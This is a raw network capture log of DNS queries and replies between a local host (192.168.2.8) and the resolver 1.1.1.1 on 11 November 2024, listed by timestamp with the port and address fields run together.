                                                                                                                                                                                                              Nov 11, 2024 18:33:43.840311050 CET53541641.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.848129034 CET5821653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.858135939 CET53582161.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.866398096 CET5806553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.875607014 CET53580651.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.881484985 CET5328153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.882030964 CET5361553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.891478062 CET53536151.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.891493082 CET53532811.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.187401056 CET6472953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.189834118 CET5741553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.190078974 CET6120753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.191699028 CET5333253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.192392111 CET6218953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.194124937 CET6419153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.195101976 CET6335453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.195516109 CET6195253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.198009968 CET6286253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.198632002 CET5315253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.199214935 CET5931153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.200292110 CET5215953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.200767040 CET5533853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.204134941 CET53641911.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.204740047 CET53633541.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.204741001 CET5305853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.207783937 CET5145053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.207904100 CET53619521.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.208051920 CET5636753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.208235979 CET6359353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.209589958 CET53531521.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.209954977 CET53593111.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.210400105 CET53628621.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.210514069 CET53621891.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.210979939 CET53521591.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.214992046 CET53530581.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.217784882 CET53635931.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.218137026 CET53563671.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.218177080 CET53514501.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.219528913 CET53647291.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.221601009 CET53574151.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.221796989 CET53612071.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.223073959 CET53533321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.231245041 CET6348653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.232587099 CET53553381.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.233154058 CET5305653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.234607935 CET5848253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.234817028 CET6395653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.234993935 CET5087453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.235141039 CET5925053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.235272884 CET5409853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.235409021 CET5941053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.235543013 CET6403553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.235677958 CET5180753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.235810995 CET5271753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.235949993 CET5762953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.236594915 CET4915753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.238607883 CET5383653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.238785028 CET6009653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.239001989 CET6136253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.239815950 CET6391953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.239970922 CET53634861.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.244266033 CET53540981.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.245095968 CET53640351.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.245398998 CET53592501.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.246654987 CET53576291.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.246890068 CET53491571.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.249051094 CET53600961.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.249313116 CET53639191.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.253228903 CET53584821.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.253535986 CET5104353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.257081032 CET5645353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.257554054 CET5165653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.257792950 CET4956753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.257955074 CET5045353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.258120060 CET6416853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.258771896 CET5290453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.259125948 CET6392153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.259614944 CET6462553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.259789944 CET6451553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.259941101 CET6099553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.264116049 CET53530561.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.264168978 CET53510431.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.265891075 CET53508741.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.266670942 CET53639561.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.267297983 CET53594101.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.267410994 CET53518071.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.267985106 CET53516561.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.268029928 CET53495671.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.268152952 CET53641681.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.268404961 CET53504531.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.268910885 CET53639211.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.269759893 CET53529041.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.269989014 CET53609951.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.270011902 CET53645151.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.270111084 CET53613621.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.270261049 CET53527171.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.270425081 CET53538361.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.271672964 CET53646251.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.288546085 CET53564531.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.776487112 CET5192853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.781151056 CET5907153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.784004927 CET5725153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.784588099 CET6429353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.792332888 CET53642931.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.792351007 CET53590711.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.793951988 CET53572511.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.794795036 CET6549253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.807334900 CET5963153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.807399035 CET53519281.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.807914019 CET6468153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.808070898 CET6059953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.817233086 CET53596311.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.820285082 CET5149153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.821042061 CET53646811.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.827068090 CET53654921.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.834007978 CET5782653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.834888935 CET6135353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.835551977 CET5856253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.839174986 CET53605991.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.839283943 CET4921953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.840733051 CET6108453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.842184067 CET4950553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.842906952 CET53585621.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.844080925 CET5999553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.845201015 CET6042453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.845530033 CET53613531.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.846118927 CET5608253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.848443985 CET6298253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.848923922 CET5576253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.850344896 CET5316853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.850866079 CET53610841.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.851778030 CET53514911.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.853105068 CET53492191.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.853879929 CET5372153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.855936050 CET53604241.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.856895924 CET53560821.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.861345053 CET53557621.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.861938953 CET53531681.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.865847111 CET53537211.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.866605043 CET53578261.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.871943951 CET6262953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.874391079 CET53495051.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.875507116 CET5731553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.875677109 CET53599951.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.877295017 CET6054153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.879067898 CET5240753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.879884005 CET53629821.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.881743908 CET53626291.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.885425091 CET5875253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.887218952 CET6110653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.887995005 CET53605411.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.889014006 CET53524071.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.892112017 CET5320253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.892281055 CET5221053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.893557072 CET5083853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.893851042 CET6071653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.895704031 CET53587521.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.896544933 CET6025253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.896743059 CET4981253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.897435904 CET53611061.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.900238991 CET5430853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.900687933 CET4999753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.901623964 CET5275253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.902024031 CET6476753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.902736902 CET53508381.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.903093100 CET53532021.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.906903982 CET53573151.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.908076048 CET53602521.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.908679008 CET53498121.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.910181046 CET53543081.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.910362005 CET53522101.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.912228107 CET53647671.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.916573048 CET5927153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.917130947 CET5996553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.917305946 CET5203553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.917447090 CET5171553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.917582035 CET5387653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.917731047 CET5467053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.917865038 CET4970453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.921768904 CET6259053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.921964884 CET4966053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.922192097 CET5341753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.922339916 CET4915853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.922532082 CET5913253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.922674894 CET5712553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.922821045 CET6042553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.922965050 CET6219553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.923110008 CET5314253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.923284054 CET6367553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.923325062 CET6181053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.923454046 CET5500353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.926240921 CET53607161.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.926603079 CET6039353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927000046 CET5930953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927174091 CET6522853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927357912 CET5673553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927537918 CET5255653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927704096 CET4966253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927731037 CET53517151.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927879095 CET53538761.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927916050 CET53599651.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.928877115 CET53546701.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.929182053 CET4992153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.931615114 CET53499971.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.932383060 CET53496601.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.932394981 CET53591321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.932914972 CET53534171.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.932934046 CET53636751.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.933028936 CET53527521.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.933346987 CET53621951.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.933357954 CET53571251.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.933526993 CET53618101.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.935230970 CET53567351.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.936065912 CET53652281.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.937158108 CET53603931.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.938081026 CET53593091.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.941035032 CET53625901.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.945770979 CET53496621.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.947479010 CET53592711.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.948695898 CET53520351.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.951378107 CET53497041.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.953634977 CET53531421.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.954309940 CET53491581.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.955837965 CET53604251.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.955866098 CET53550031.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.961011887 CET53525561.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.962141037 CET53499211.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.352845907 CET5255053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.362781048 CET53525501.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.438169956 CET5606653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.438550949 CET5826153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.439269066 CET5226253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.440757036 CET5107553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.440814018 CET6341553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.441157103 CET5028653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.441665888 CET5507953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.442045927 CET5472853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.445207119 CET5463153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.446858883 CET5414253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.448770046 CET53522621.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.449376106 CET6459353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.450562954 CET53510751.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.450901985 CET53547281.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.450916052 CET53502861.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.451132059 CET53634151.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.451149940 CET5634053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.455437899 CET53546311.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.459986925 CET53645931.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.469146013 CET5849153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.470526934 CET53582611.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.470938921 CET53560661.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.474606991 CET53550791.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.478651047 CET53541421.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.478667974 CET53584911.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.482528925 CET53563401.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.494211912 CET5310353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.494399071 CET5185153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.495002031 CET5559853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.495157003 CET6297653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.495964050 CET6227053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.505455971 CET53629761.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.506566048 CET53622701.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.507297993 CET53555981.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.507450104 CET5052453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.508481026 CET5434753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.508667946 CET6277153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.516618967 CET53627711.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.518471003 CET53505241.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.518595934 CET53543471.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.521083117 CET5498053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.525264025 CET53531031.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.525384903 CET53518511.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.525666952 CET5162353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.528795958 CET53549801.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.536370993 CET53516231.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.587269068 CET5364453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.587917089 CET5597253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.588097095 CET5551053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.589493990 CET6334153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.589884043 CET6432953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.591134071 CET6252753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.591998100 CET5199053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.592411995 CET6361753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.598453999 CET53555101.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.598603964 CET53536441.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.598624945 CET53559721.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.598972082 CET53633411.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.600321054 CET53643291.1.1.1192.168.2.8
